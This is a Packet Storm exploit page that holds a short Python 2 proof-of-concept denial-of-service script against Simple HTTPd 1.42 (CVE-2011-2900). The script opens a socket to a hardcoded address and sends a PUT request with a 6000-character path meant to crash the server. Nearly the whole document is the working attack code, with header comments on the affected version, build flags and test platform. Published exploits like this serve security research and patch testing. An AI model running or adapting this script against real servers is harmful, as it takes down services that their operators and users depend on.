Simple HTTPd version 1.42 denial of service exploit.
983ba160baafe038dbef7b4b94dae3df66ed0a1b8efcefb1163821f13b7b28a7#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link: http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit still works.
# Simple HTTPd is still affected by the bug. The executable must be compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.
import socket, sys
buf = "A" * 6000
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))
s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed